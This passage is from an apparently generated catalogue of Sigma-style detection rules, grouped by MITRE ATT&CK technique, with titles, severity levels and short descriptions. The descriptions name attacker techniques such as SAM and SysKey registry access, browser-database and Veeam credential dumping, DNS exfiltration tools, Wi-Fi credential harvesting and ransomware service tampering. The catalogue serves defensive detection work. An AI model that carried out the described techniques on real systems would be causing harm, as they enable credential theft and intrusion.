    Description: Monitor and alert on group membership additions of groups that have CA policy modification access
  • User Removed From Group With CA Policy Modification Access - Level: medium
    Description: Monitor and alert on group membership removal of groups that have CA policy modification access
  • Github High Risk Configuration Disabled - Level: high
    Description: Detects when a user disables a critical security feature for an organization.
  • Disabling Multi Factor Authentication - Level: high
    Description: Detects disabling of Multi Factor Authentication.
  • Possible Shadow Credentials Added - Level: high
    Description: Detects possible addition of shadow credentials to an active directory object.
  • Directory Service Restore Mode(DSRM) Registry Value Tampering - Level: high
    Description: Detects changes to "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory. If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
attack.t1012 13
Show Rules (13)
  • Azure AD Health Monitoring Agent Registry Keys Access - Level: medium
    Description: This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
  • Azure AD Health Service Agents Registry Keys Access - Level: medium
    Description: This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys.
  • SAM Registry Hive Handle Request - Level: high
    Description: Detects handles requested to SAM registry hive
  • SysKey Registry Keys Access - Level: high
    Description: Detects handle requests and access operations to specific registry keys to calculate the SysKey
  • HackTool - PCHunter Execution - Level: high
    Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
  • Exports Critical Registry Keys To a File - Level: high
    Description: Detects the export of a crital Registry key to a file.
  • Exports Registry Key To a File - Level: low
    Description: Detects the export of the target Registry key to a file.
  • Potential Configuration And Service Reconnaissance Via Reg.EXE - Level: medium
    Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
  • Potential Baby Shark Malware Activity - Level: high
    Description: Detects activity that could be related to Baby Shark malware
  • Operation Wocao Activity - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Operation Wocao Activity - Security - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Remote Registry Management Using Reg Utility - Level: medium
    Description: Remote registry management using REG utility from non-admin workstation
  • Potential Registry Reconnaissance Via PowerShell Script - Level: medium
    Description: Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software.
attack.t1005 12
Show Rules (12)
  • iOS Implant URL Pattern - Level: critical
    Description: Detects URL pattern used by iOS Implant
  • OpenCanary - SMB File Open Request - Level: high
    Description: Detects instances where an SMB service on an OpenCanary node has had a file open request.
  • AWS EC2 VM Export Failure - Level: low
    Description: An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.
  • Cisco Collect Data - Level: low
    Description: Collect pertinent data from the configuration files
  • ADFS Database Named Pipe Connection By Uncommon Tool - Level: medium
    Description: Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.
  • Esentutl Steals Browser Information - Level: medium
    Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe
  • Veeam Backup Database Suspicious Query - Level: medium
    Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
  • VeeamBackup Database Credentials Dump Via Sqlcmd.EXE - Level: high
    Description: Detects dump of credentials in VeeamBackup dbo
  • SQLite Chromium Profile Data DB Access - Level: high
    Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
  • SQLite Firefox Profile Data DB Access - Level: high
    Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
  • Potential Conti Ransomware Database Dumping Activity Via SQLCmd - Level: high
    Description: Detects a command used by conti to dump database
  • Potential Exfiltration of Compressed Files - Level: medium
    Description: This rule detects potential exfiltration by looking for a few compression extensions in the uri and signs of compression in the mime type, file type, and http body
attack.t1543 12
Show Rules (12)
  • Usage Of Malicious POORTRY Signed Driver - Level: high
    Description: Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.
  • Vulnerable Dell BIOS Update Driver Load - Level: high
    Description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551
  • Vulnerable Lenovo Driver Load - Level: high
    Description: Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges
  • CodeIntegrity - Blocked Image/Driver Load For Policy Violation - Level: high
    Description: Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.
  • CodeIntegrity - Blocked Driver Load With Revoked Certificate - Level: high
    Description: Detects blocked load attempts of revoked drivers
  • Service Installed By Unusual Client - Security - Level: high
    Description: Detects a service installed by a client which has PID 0 or whose parent has PID 0
  • KrbRelayUp Service Installation - Level: high
    Description: Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)
  • Service Installed By Unusual Client - System - Level: high
    Description: Detects a service installed by a client which has PID 0 or whose parent has PID 0
  • PUA - System Informer Driver Load - Level: medium
    Description: Detects driver load of the System Informer tool
  • PUA - Process Hacker Driver Load - Level: high
    Description: Detects driver load of the Process Hacker tool
  • PUA - Process Hacker Execution - Level: medium
    Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
  • PUA - System Informer Execution - Level: medium
    Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
attack.t1048 12
Show Rules (12)
  • Dnscat Execution - Level: critical
    Description: Dnscat exfiltration tool execution
  • DNS TOR Proxies - Level: medium
    Description: Identifies IPs performing DNS lookups associated with common Tor proxies.
  • Tap Driver Installation - Security - Level: low
    Description: Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.
  • Tap Driver Installation - Level: medium
    Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques
  • Powershell DNSExfiltration - Level: high
    Description: DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel
  • Data Export From MSSQL Table Via BCP.EXE - Level: medium
    Description: Detects the execution of the BCP utility in order to export data from the database. Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
  • Copy From Or To Admin Share Or Sysvol Folder - Level: medium
    Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
  • Suspicious Redirection to Local Admin Share - Level: high
    Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers
  • Tap Installer Execution - Level: medium
    Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
  • High DNS subdomain requests rate per domain - Level: high
    Description: High rate of unique Fully Qualified Domain Names (FQDN) requests per root domain (eTLD+1) in short period of time
  • Large domain name request - Level: high
    Description: Detects large DNS domain names
  • Tap Driver Installation - Level: medium
    Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques
attack.t1489 12
Show Rules (12)
  • Stop Windows Service - Level: low
    Description: Detects a Windows service to be stopped
  • Azure Application Deleted - Level: medium
    Description: Identifies when a application is deleted in Azure.
  • Application Uninstalled - Level: low
    Description: An application has been removed. Check if it is critical.
  • Important Scheduled Task Deleted - Level: high
    Description: Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
  • Stop Windows Service Via Net.EXE - Level: low
    Description: Detects the stopping of a Windows service via the "net" utility.
  • Stop Windows Service Via PowerShell Stop-Service - Level: low
    Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"
  • Delete Important Scheduled Task - Level: high
    Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
  • Delete All Scheduled Tasks - Level: high
    Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
  • Disable Important Scheduled Task - Level: high
    Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities
  • Stop Windows Service Via Sc.EXE - Level: low
    Description: Detects the stopping of a Windows service via the "sc.exe" utility
  • Suspicious Windows Service Tampering - Level: high
    Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts
  • Process Terminated Via Taskkill - Level: low
    Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
attack.t1546 11
Show Rules (11)
  • Suspicious Get-WmiObject - Level: low
    Description: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers
  • New Outlook Macro Created - Level: medium
    Description: Detects the creation of a macro file for Outlook.
  • Suspicious Outlook Macro Created - Level: high
    Description: Detects the creation of a macro file for Outlook.
  • Suspicious Get-Variable.exe Creation - Level: high
    Description: Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
  • Control Panel Items - Level: high
    Description: Detects the malicious use of a control panel item
  • COM Hijack via Sdclt - Level: high
    Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
  • Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting - Level: high
    Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
  • Outlook Macro Execution Without Warning Setting Enabled - Level: high
    Description: Detects the modification of Outlook security setting to allow unprompted execution of macros.
  • HAFNIUM Exchange Exploitation Activity - Level: critical
    Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
  • SOURGUM Actor Behaviours - Level: high
    Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
  • MSSQL Extended Stored Procedure Backdoor Maggie - Level: high
    Description: This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server
attack.t1021 11
Show Rules (11)
  • Lateral Movement Indicator ConDrv - Level: low
    Description: This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context.
  • OpenCanary - FTP Login Attempt - Level: high
    Description: Detects instances where an FTP service on an OpenCanary node has had a login attempt.
  • OpenCanary - SMB File Open Request - Level: high
    Description: Detects instances where an SMB service on an OpenCanary node has had a file open request.
  • OpenCanary - SNMP OID Request - Level: high
    Description: Detects instances where an SNMP service on an OpenCanary node has had an OID request.
  • OpenCanary - SSH Login Attempt - Level: high
    Description: Detects instances where an SSH service on an OpenCanary node has had a login attempt.
  • OpenCanary - SSH New Connection Attempt - Level: high
    Description: Detects instances where an SSH service on an OpenCanary node has had a connection attempt.
  • OpenCanary - VNC Connection Attempt - Level: high
    Description: Detects instances where a VNC service on an OpenCanary node has had a connection attempt.
  • Privilege Escalation via Named Pipe Impersonation - Level: high
    Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
  • Potential Remote Desktop Tunneling - Level: medium
    Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
  • Psexec Execution - Level: medium
    Description: Detects user accept agreement execution in psexec commandline
  • New RDP Connection Initiated From Domain Controller - Level: high
    Description: Detects an RDP connection originating from a domain controller.
attack.t1552 11
Show Rules (11)
  • Kubernetes Admission Controller Modification - Level: medium
    Description: Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.
  • Azure Keyvault Key Modified or Deleted - Level: medium
    Description: Identifies when a Keyvault Key is modified or deleted in Azure.
  • Azure Key Vault Modified or Deleted - Level: medium
    Description: Identifies when a key vault is modified or deleted.
  • Azure Keyvault Secrets Modified or Deleted - Level: medium
    Description: Identifies when secrets are modified or deleted in Azure.
  • Azure Kubernetes Admission Controller - Level: medium
    Description: Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
  • Application AppID Uri Configuration Changes - Level: high
    Description: Detects when a configuration change is made to an applications AppID URI.
  • Added Owner To Application - Level: medium
    Description: Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.
  • Google Cloud Kubernetes Admission Controller - Level: medium
    Description: Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
  • Potential Okta Password in AlternateID Field - Level: high
    Description: Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.
  • Potentially Suspicious EventLog Recon Activity Using Log Query Utilities - Level: medium
    Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
  • EventLog Query Requests By Builtin Utilities - Level: medium
    Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
attack.t1007 11
Show Rules (11)
  • Crontab Enumeration - Level: low
    Description: Detects usage of crontab to list the tasks of the user
  • ESXi Network Configuration Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
  • ESXi Storage Information Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
  • ESXi System Information Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.
  • ESXi VM List Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
  • ESXi VSAN Information Discovery Via ESXCLI - Level: medium
    Description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
  • HackTool - PCHunter Execution - Level: high
    Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
  • Potential Configuration And Service Reconnaissance Via Reg.EXE - Level: medium
    Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
  • Potential Registry Reconnaissance Via PowerShell Script - Level: medium
    Description: Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software.
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
  • SC.EXE Query Execution - Level: low
    Description: Detects execution of "sc.exe" to query information about registered services on the system
attack.s0111 11
Show Rules (11)
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation - Level: high
    Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
  • Scheduled Task Creation Via Schtasks.EXE - Level: low
    Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Defrag Deactivation - Level: medium
    Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  • Defrag Deactivation - Security - Level: medium
    Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  • Scheduled Task Created - FileCreation - Level: low
    Description: Detects the creation of a scheduled task via file creation.
  • Scheduled Task Created - Registry - Level: low
    Description: Detects the creation of a scheduled task via Registry keys.
  • Rare Scheduled Task Creations - Level: low
    Description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.
attack.t1204 10
Show Rules (10)
  • Ryuk Ransomware Command Line Activity - Level: critical
    Description: Detects Ryuk Ransomware command lines
  • Process Start From Suspicious Folder - Level: low
    Description: Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files
  • Antivirus Hacktool Detection - Level: high
    Description: Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
  • Payload Decoded and Decrypted via Built-in Utilities - Level: medium
    Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
  • Arbitrary Shell Command Execution Via Settingcontent-Ms - Level: medium
    Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
  • Potentially Suspicious WebDAV LNK Execution - Level: medium
    Description: Detects possible execution via LNK file accessed on a WebDAV server.
  • PrinterNightmare Mimikatz Driver Name - Level: critical
    Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
  • Potential Snatch Ransomware Activity - Level: high
    Description: Detects specific process characteristics of Snatch ransomware word document droppers
  • DarkSide Ransomware Pattern - Level: critical
    Description: Detects DarkSide Ransomware and helpers
attack.t1020 10
Show Rules (10)
  • AWS RDS Master Password Change - Level: medium
    Description: Detects the change of database master password. It may be a part of data exfiltration.
  • Modification or Deletion of an AWS RDS Cluster - Level: high
    Description: Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information.
  • Restore Public AWS RDS Instance - Level: high
    Description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.
  • Github Fork Private Repositories Setting Enabled/Cleared - Level: medium
    Description: Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).
  • Github Repository/Organization Transferred - Level: medium
    Description: Detects when a repository or an organization is being transferred to another location.
  • Suspicious Inbox Forwarding - Level: low
    Description: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.
  • PowerShell Script With File Hostname Resolving Capabilities - Level: medium
    Description: Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.
  • PowerShell Script With File Upload Capabilities - Level: low
    Description: Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method.
  • Mail Forwarding/Redirecting Activity In O365 - Level: medium
    Description: Detects email forwarding or redirecting acitivty in O365 Audit logs.
  • AWS EC2 Download Userdata - Level: medium
    Description: Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.
attack.t1113 10
Show Rules (10)
  • Screen Capture with Import Tool - Level: low
    Description: Detects adversary creating screen capture of a desktop with Import Tool. Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. ImageMagick must be installed.
  • Screen Capture with Xwd - Level: low
    Description: Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations
  • Screen Capture - macOS - Level: low
    Description: Detects attempts to use screencapture to collect macOS screenshots
  • Windows Screen Capture with CopyFromScreen - Level: medium
    Description: Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations
  • Screen Capture Activity Via Psr.EXE - Level: medium
    Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
  • Windows Recall Feature Enabled Via Reg.EXE - Level: medium
    Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
  • Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted - Level: medium
    Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
  • Periodic Backup For System Registry Hives Enabled - Level: medium
    Description: Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups. Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".
  • Windows Recall Feature Enabled - Registry - Level: medium
    Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
  • System Drawing DLL Load - Level: low
    Description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture.
attack.t1564 10
Show Rules (10)
  • Mount Execution With Hidepid Parameter - Level: medium
    Description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
  • Suspicious Creation with Colorcpl - Level: high
    Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
  • Suspicious Executable File Creation - Level: high
    Description: Detect creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
  • PUA - Process Hacker Execution - Level: medium
    Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
  • PUA - System Informer Execution - Level: medium
    Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
  • Potentially Suspicious Execution From Parent Process In Public Folder - Level: high
    Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
  • Detect Virtualbox Driver Installation OR Starting Of VMs - Level: low
    Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
  • CrashControl CrashDump Disabled - Level: medium
    Description: Detects disabling the CrashDump per registry (as used by HermeticWiper)
  • Sysmon Configuration Error - Level: high
    Description: Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages
  • Sysmon Configuration Modification - Level: high
    Description: Detects when an attacker tries to hide from Sysmon by disabling or stopping it
attack.t1531 9
Show Rules (9)
  • AWS SAML Provider Deletion Activity - Level: medium
    Description: Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.
  • AWS ElastiCache Security Group Modified or Deleted - Level: low
    Description: Identifies when an ElastiCache security group has been modified or deleted.
  • Azure Kubernetes Service Account Modified or Deleted - Level: medium
    Description: Identifies when a service account is modified or deleted.
  • Google Cloud Service Account Disabled or Deleted - Level: medium
    Description: Identifies when a service account is disabled or deleted in Google Cloud.
  • Okta User Account Locked Out - Level: medium
    Description: Detects when an user account is locked out.
  • Group Has Been Deleted Via Groupdel - Level: medium
    Description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
  • User Has Been Deleted Via Userdel - Level: medium
    Description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
  • User Logoff Event - Level: informational
    Description: Detects a user log-off activity. Could be used for example to correlate information during forensic investigations
  • Remove Account From Domain Admin Group - Level: medium
    Description: Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
attack.t1040 9
Show Rules (9)
  • Network Sniffing - Linux - Level: low
    Description: Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
  • Network Sniffing - MacOs - Level: informational
    Description: Detects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
  • Cisco Sniffing - Level: medium
    Description: Show when a monitor or a span/rspan is setup or modified
  • Windows Pcap Drivers - Level: medium
    Description: Detects Windows Pcap driver installation based on a list of associated .sys files.
  • Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock - Level: medium
    Description: Detects the execution of powershell scripts with calls to the "Start-NetEventSession" cmdlet. Which allows an attacker to start event and packet capture for a network event session. Adversaries may attempt to capture network to gather information over the course of an operation. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.
  • New Network Trace Capture Started Via Netsh.EXE - Level: medium
    Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
  • Harvesting Of Wifi Credentials Via Netsh.EXE - Level: medium
    Description: Detect the harvesting of wifi credentials using netsh.exe
  • PktMon.EXE Execution - Level: medium
    Description: Detects execution of PktMon, a tool that captures network packets.
  • Potential Network Sniffing Activity Using Network Tools - Level: medium
    Description: Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
attack.t1049 9
Show Rules (9)
  • System Network Connections Discovery - Linux - Level: low
    Description: Detects usage of system utilities to discover system network connections
  • System Network Connections Discovery - MacOs - Level: informational
    Description: Detects usage of system utilities to discover system network connections
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • Use Get-NetTCPConnection - Level: low
    Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
  • Use Get-NetTCPConnection - PowerShell Module - Level: low
    Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
  • HackTool - SharpView Execution - Level: high
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • System Network Connections Discovery Via Net.EXE - Level: low
    Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
  • Potential Pikabot Discovery Activity - Level: high
    Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.s0190 9
Show Rules (9)
  • Bitsadmin to Uncommon IP Server Address - Level: high
    Description: Detects Bitsadmin connections to IP addresses instead of FQDN names
  • Bitsadmin to Uncommon TLD - Level: high
    Description: Detects Bitsadmin connections to domains with uncommon TLDs
  • Suspicious Download From Direct IP Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
  • File Download Via Bitsadmin - Level: medium
    Description: Detects usage of bitsadmin downloading a file
  • Suspicious Download From File-Sharing Website Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file from a suspicious domain
  • File With Suspicious Extension Downloaded Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file with a suspicious extension
  • File Download Via Bitsadmin To A Suspicious Target Folder - Level: high
    Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
  • File Download Via Bitsadmin To An Uncommon Target Folder - Level: medium
    Description: Detects usage of bitsadmin downloading a file to uncommon target folder
  • Exploited CVE-2020-10189 Zoho ManageEngine - Level: high
    Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
attack.t1574 9
Show Rules (9)
